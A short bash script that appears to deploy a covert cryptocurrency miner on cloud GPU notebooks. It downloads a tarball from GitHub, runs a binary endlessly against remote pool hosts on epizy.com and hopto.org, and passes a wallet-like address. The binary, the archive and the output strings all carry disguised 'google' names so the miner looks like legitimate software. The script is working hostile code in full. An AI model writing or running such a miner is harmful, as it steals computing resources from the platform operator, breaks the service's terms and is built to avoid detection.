apt-get install -y libcpprest-dev libgmp-dev libargon2-0-dev

cd /notebooks/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/googleapps8474127412742.tar.gz
tar -xvf ./googleapps8474127412742.tar.gz

cd googleapps8474

while true
do

google8474=$(nvidia-smi --query-gpu=name --format=csv,noheader | sed "s/ //g")

if [[ $google8474 == "QuadroP4000" ]]
then

timeout 84 ./google84121274 -p http://mobile8474.epizy.com -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 12 -b 12
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

else

if [[ $google8474 == "QuadroM4000" ]]
then

timeout 84 ./google84121274 -p http://mobile8474.epizy.com -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 12 -b 12
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

else

if [[ $google8474 == "QuadroP5000" ]]
then

timeout 84 ./google84121274 -p http://mobile8474.epizy.com -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 12 -b 12
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

else

timeout 84 ./google84121274 -p http://mobile8474.hopto.org -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 1 -b 8
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

fi

fi

done
